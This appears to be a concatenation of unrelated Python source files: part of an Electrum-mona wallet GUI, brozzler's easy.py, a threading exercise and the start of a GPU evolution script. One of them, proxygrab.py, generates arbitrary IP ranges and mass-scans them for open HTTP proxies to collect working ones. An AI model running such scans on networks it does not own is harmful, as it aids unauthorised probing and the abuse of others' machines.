except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("zcore:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_mona import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-mona-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
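# The key export runs in a plain Python thread; progress and completion are reported back to the GUI thread via the two Qt signals connected below.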
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
#if is_final:
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
proxygrab.py |
import threading, requests, time, os, sys, random
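# NOTE: this script targets Python 2 (it uses raw_input); under Python 3, replace raw_input with input.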
class RangeIP_Generate(object):
def __init__(self):
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
StartIP = raw_input(self.c + ' Start IP: ' + self.w)
ENDIP = raw_input(self.c + ' End IP: ' + self.w)
PRoxYPort = raw_input(self.c + ' Enter Proxy port [8080,80]: ' + self.w)
ip_range = self.Generate_IP(StartIP, ENDIP)
for ip in ip_range:
print(' ' + self.y + str(ip) + ':' + str(PRoxYPort))
with open('scanIps.txt', 'a') as xX:
xX.write(str(ip) + ':' + str(PRoxYPort) + '\n')
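# Return to the menu by constructing Main() again; note this recurses into a new menu rather than returning, so the call stack grows with repeated use.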
Main()
def Generate_IP(self, start_ip, end_ip): # Thanks --> cmikavac.net
Start = list(map(int, start_ip.split(".")))
end = list(map(int, end_ip.split(".")))
rec = Start # rec aliases Start (same list object), so Start[3] += 1 below advances rec too
ip_range = []
ip_range.append(start_ip)
while rec != end:
Start[3] += 1
for i in (3, 2, 1):
if rec[i] == 256:
rec[i] = 0
rec[i - 1] += 1
ip_range.append(".".join(map(str, rec)))
return ip_range
class ScaNIP(object):
def __init__(self):
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
IpList = raw_input(self.c + " Input IP List [ip:port]: " + self.w)
with open(IpList, 'r') as reader:
file = reader.read().splitlines()
thread = []
for x in file:
t = threading.Thread(target=self.CheckIP, args=(x, ''))
t.start()
thread.append(t)
time.sleep(0.05)
for j in thread:
j.join()
Main()
def CheckIP(self, Proxy, x):
try:
Got = requests.get('http://httpbin.org/html', proxies={'http': Proxy}, timeout=5)
if 'Herman Melville - Moby-Dick' in Got.text:
print(self.c + ' ' + str(Proxy) + ' ---> ' + self.g + str(Got.status_code))
with open('WorkHttpProxy.txt', 'a') as xX:
xX.write(Proxy + '\n')
except requests.Timeout:
print(self.c + ' ' + str(Proxy) + ' ---> ' + self.y + 'Timeout!')
except requests.ConnectionError:
print(self.c + ' ' + str(Proxy) + ' ---> ' + self.r + 'Dead IP!')
class Main():
def __init__(self):
self.gg = True
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.cls()
self.print_logo()
self.PrintOptions()
while self.gg == True:
Chose = raw_input(str(' @> '))
if Chose == str(1):
self.cls()
self.print_logo()
RangeIP_Generate()
elif Chose == str(2):
self.cls()
self.print_logo()
ScaNIP()
elif Chose == str(99):
self.gg = False
sys.exit()
elif Chose == "help" or Chose == "Help" or Chose == "HELP":
self.PrintOptions()
elif Chose == "cls" or Chose == "clear":
self.cls()
self.print_logo()
self.PrintOptions()
else:
continue
def cls(self):
linux = 'clear'
windows = 'cls'
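# [linux, windows][os.name == 'nt'] indexes with the boolean: True (1) selects 'cls' on Windows, False (0) selects 'clear' elsewhere.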
os.system([linux, windows][os.name == 'nt'])
def print_logo(self):
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37]
x = """
_____ _____ _
| __ \ SadCode.org / ____| | |
| |__) | __ _____ ___ _| | __ _ __ __ _| |__
| ___/ '__/ _ \ \/ / | | | | |_ | '__/ _` | '_ \
| | | | | (_) > <| |_| | |__| | | | (_| | |_) |
|_| |_| \___/_/\_|\__, |\_____|_| \__,_|_.__/
__/ |
Coded By VanGans |___/ SadCode Official
"""
for N, line in enumerate(x.split("\n")):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
def PrintOptions(self):
print(self.y + ' [1] ' + self.c + ' IP Range Generator')
print(self.y + ' [2] ' + self.c + ' Proxy Scanner')
print(self.y + ' [99]' + self.c + ' Exit')
Main()
|
num4.py | import threading
import time
import random
total = []
locking = threading.Lock()
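# The lock serializes appends to the shared list from both producer threads; list.append is atomic in CPython, but the lock makes the intent explicit.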
def produce(cnt):
global total
while cnt>0:
locking.acquire()
total.append(random.randint(1,101))
locking.release()
cnt-=1
thread_A = threading.Thread(target=produce, args=(20,))
thread_B = threading.Thread(target=produce, args=(30,))
thread_A.start()
thread_B.start()
thread_A.join()
thread_B.join()
total_sum = 0 # avoid shadowing the built-in sum()
for num in total:
total_sum += num
print(total_sum, len(total)) |
easy.py | #!/usr/bin/env python
'''
brozzler-easy - brozzler-worker, warcprox, pywb, and brozzler-dashboard all
working together in a single process
Copyright (C) 2016 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys
import logging
try:
import warcprox
import warcprox.main
import pywb
import brozzler.pywb
import wsgiref.simple_server
import wsgiref.handlers
import brozzler.dashboard
except ImportError as e:
logging.critical(
'%s: %s\n\nYou might need to run "pip install '
'brozzler[easy]".\nSee README.rst for more information.',
type(e).__name__, e)
sys.exit(1)
import argparse
import brozzler
import brozzler.cli
import os
import socket
import signal
import threading
import time
import doublethink
import traceback
import socketserver
def _build_arg_parser(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
formatter_class=brozzler.cli.BetterArgumentDefaultsHelpFormatter,
prog=os.path.basename(argv[0]), description=(
'brozzler-easy - easy deployment of brozzler, with '
'brozzler-worker, warcprox, pywb, and brozzler-dashboard all '
'running in a single process'))
# common args
brozzler.cli.add_rethinkdb_options(arg_parser)
arg_parser.add_argument(
'-d', '--warcs-dir', dest='warcs_dir', default='./warcs',
help='where to write warcs')
# warcprox args
arg_parser.add_argument(
'-c', '--cacert', dest='cacert',
default='./%s-warcprox-ca.pem' % socket.gethostname(),
help=(
'warcprox CA certificate file; if file does not exist, it '
'will be created'))
arg_parser.add_argument(
'--certs-dir', dest='certs_dir',
default='./%s-warcprox-ca' % socket.gethostname(),
help='where warcprox will store and load generated certificates')
arg_parser.add_argument(
'--onion-tor-socks-proxy', dest='onion_tor_socks_proxy',
default=None, help=(
'host:port of tor socks proxy, used only to connect to '
'.onion sites'))
# brozzler-worker args
arg_parser.add_argument(
'-e', '--chrome-exe', dest='chrome_exe',
default=brozzler.cli.suggest_default_chrome_exe(),
help='executable to use to invoke chrome')
arg_parser.add_argument(
'-n', '--max-browsers', dest='max_browsers',
type=int, default=1, help=(
'max number of chrome instances simultaneously '
'browsing pages'))
# pywb args
arg_parser.add_argument(
'--pywb-address', dest='pywb_address',
default='0.0.0.0',
help='pywb wayback address to listen on')
arg_parser.add_argument(
'--pywb-port', dest='pywb_port', type=int,
default=8880, help='pywb wayback port')
# dashboard args
arg_parser.add_argument(
'--dashboard-address', dest='dashboard_address',
default='localhost',
help='brozzler dashboard address to listen on')
arg_parser.add_argument(
'--dashboard-port', dest='dashboard_port',
type=int, default=8881, help='brozzler dashboard port')
# common at the bottom args
brozzler.cli.add_common_options(arg_parser, argv)
return arg_parser
class ThreadingWSGIServer(
socketserver.ThreadingMixIn, wsgiref.simple_server.WSGIServer):
pass
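# Mixing socketserver.ThreadingMixIn into WSGIServer yields a WSGI server that handles each request in its own thread, so pywb and the dashboard can serve concurrent requests.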
class BrozzlerEasyController:
logger = logging.getLogger(__module__ + "." + __qualname__)
def __init__(self, args):
self.stop = threading.Event()
self.args = args
self.warcprox_controller = warcprox.main.init_controller(
self._warcprox_args(args))
self.brozzler_worker = self._init_brozzler_worker(args)
self.pywb_httpd = self._init_pywb(args)
self.dashboard_httpd = self._init_brozzler_dashboard(args)
def _init_brozzler_dashboard(self, args):
return wsgiref.simple_server.make_server(
args.dashboard_address, args.dashboard_port,
brozzler.dashboard.app, ThreadingWSGIServer)
def _init_brozzler_worker(self, args):
rr = doublethink.Rethinker(
args.rethinkdb_servers.split(","), args.rethinkdb_db)
frontier = brozzler.RethinkDbFrontier(rr)
service_registry = doublethink.ServiceRegistry(rr)
worker = brozzler.worker.BrozzlerWorker(
frontier, service_registry, chrome_exe=args.chrome_exe,
proxy='%s:%s' % self.warcprox_controller.proxy.server_address,
max_browsers=args.max_browsers)
return worker
def _init_pywb(self, args):
brozzler.pywb.TheGoodUrlCanonicalizer.replace_default_canonicalizer()
brozzler.pywb.TheGoodUrlCanonicalizer.monkey_patch_dsrules_init()
brozzler.pywb.support_in_progress_warcs()
brozzler.pywb.monkey_patch_wburl()
brozzler.pywb.monkey_patch_fuzzy_query()
brozzler.pywb.monkey_patch_calc_search_range()
if args.warcs_dir.endswith('/'):
warcs_dir = args.warcs_dir
else:
warcs_dir = args.warcs_dir + '/'
conf = {
'collections': {
'brozzler': {
'index_paths': brozzler.pywb.RethinkCDXSource(
servers=args.rethinkdb_servers.split(","),
db=args.rethinkdb_db, table='captures')
},
},
# 'enable_http_proxy': True,
# 'enable_memento': True,
'archive_paths': warcs_dir,
'enable_cdx_api': True,
'framed_replay': True,
'port': args.pywb_port,
'enable_auto_colls': False,
}
wsgi_app = pywb.framework.wsgi_wrappers.init_app(
pywb.webapp.pywb_init.create_wb_router, config=conf,
load_yaml=False)
# disable is_hop_by_hop restrictions
wsgiref.handlers.is_hop_by_hop = lambda x: False
return wsgiref.simple_server.make_server(
args.pywb_address, args.pywb_port, wsgi_app,
ThreadingWSGIServer)
def start(self):
self.logger.info('starting warcprox')
self.warcprox_controller.start()
# XXX wait til fully started?
self.logger.info('starting brozzler-worker')
self.brozzler_worker.start()
self.logger.info(
'starting pywb at %s:%s', *self.pywb_httpd.server_address)
threading.Thread(target=self.pywb_httpd.serve_forever).start()
self.logger.info(
'starting brozzler-dashboard at %s:%s',
*self.dashboard_httpd.server_address)
threading.Thread(target=self.dashboard_httpd.serve_forever).start()
def shutdown(self):
self.logger.info('shutting down brozzler-dashboard')
self.dashboard_httpd.shutdown()
self.logger.info('shutting down brozzler-worker')
self.brozzler_worker.shutdown_now()
# brozzler-worker is fully shut down at this point
self.logger.info('shutting down pywb')
self.pywb_httpd.shutdown()
self.logger.info('shutting down warcprox')
self.warcprox_controller.shutdown()
def wait_for_shutdown_request(self):
try:
while not self.stop.is_set():
time.sleep(0.5)
finally:
self.shutdown()
def _warcprox_args(self, args):
'''
Takes args as produced by the argument parser built by
_build_arg_parser and builds warcprox arguments object suitable to pass
to warcprox.main.init_controller. Copies some arguments, renames some,
populates some with defaults appropriate for brozzler-easy, etc.
'''
warcprox_args = argparse.Namespace()
warcprox_args.address = 'localhost'
# let the OS choose an available port; discover it later using
# sock.getsockname()[1]
warcprox_args.port = 0
warcprox_args.cacert = args.cacert
warcprox_args.certs_dir = args.certs_dir
warcprox_args.directory = args.warcs_dir
warcprox_args.gzip = True
warcprox_args.prefix = 'brozzler'
warcprox_args.size = 1000 * 1000 * 1000
warcprox_args.rollover_idle_time = 3 * 60
warcprox_args.digest_algorithm = 'sha1'
warcprox_args.base32 = True
warcprox_args.stats_db_file = None
warcprox_args.playback_port = None
warcprox_args.playback_index_db_file = None
warcprox_args.rethinkdb_servers = args.rethinkdb_servers
warcprox_args.rethinkdb_db = args.rethinkdb_db
warcprox_args.rethinkdb_big_table = True
warcprox_args.kafka_broker_list = None
warcprox_args.kafka_capture_feed_topic = None
warcprox_args.queue_size = 500
warcprox_args.max_threads = None
warcprox_args.profile = False
warcprox_args.onion_tor_socks_proxy = args.onion_tor_socks_proxy
return warcprox_args
def dump_state(self, signum=None, frame=None):
state_strs = []
for th in threading.enumerate():
state_strs.append(str(th))
stack = traceback.format_stack(sys._current_frames()[th.ident])
state_strs.append(''.join(stack))
logging.warning('dumping state (caught signal {})\n{}'.format(
signum, '\n'.join(state_strs)))
def main(argv=None):
argv = argv or sys.argv
arg_parser = _build_arg_parser(argv)
args = arg_parser.parse_args(args=argv[1:])
brozzler.cli.configure_logging(args)
controller = BrozzlerEasyController(args)
signal.signal(signal.SIGTERM, lambda a,b: controller.stop.set())
signal.signal(signal.SIGINT, lambda a,b: controller.stop.set())
signal.signal(signal.SIGQUIT, controller.dump_state)
controller.start()
controller.wait_for_shutdown_request()
|
evolve.py | #!/usr/bin/env python3
import subprocess
import random
import csv
import json
import pickle
import pathlib
import sys
import filecmp
import logging
import io
import os
import time
import gc
import shutil
from itertools import cycle
from threading import Thread
from threading import Event
from threading import Lock
# Use the non-interactive Agg backend so matplotlib works on headless machines (avoids display-not-found errors)
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from deap import base
from deap import creator
from deap import tools
import pptx
import psutil
from rich import print
import rich.progress
from rich.progress import Progress
from rich.logging import RichHandler
import pycuda.driver as cuda
from gevo import irind
from gevo.irind import edits_as_key, llvmMutateWrap
from gevo import fuzzycompare, variancecalc
# lock protecting the multithreaded critical sections
lock = Lock()
class evolution:
# Parameters
cudaPTX = 'gevo.ptx'
editFitMap = {}
# Content
pop = []
threadPool = []
terminateEvent = Event()
generation = 0
presentation = pptx.Presentation()
mutStats = {
'failDistribution': {'-1': 0},
'valid':0, 'invalid':0, 'infinite':0,
'op_success':{
'c':0, 'r':0, 'i':0, 's':0, 'm':0, 'p':0, 'x':0
},
'op_fail':{
'c':0, 'r':0, 'i':0, 's':0, 'm':0, 'p':0, 'x':0
},
}
evalStats = {'cx':{'pass':[0],'fail':[0]}, 'mut':{'pass':[0],'fail':[0]}, 'epi':{'pass':[0],'fail':[0]}}
class _testcase:
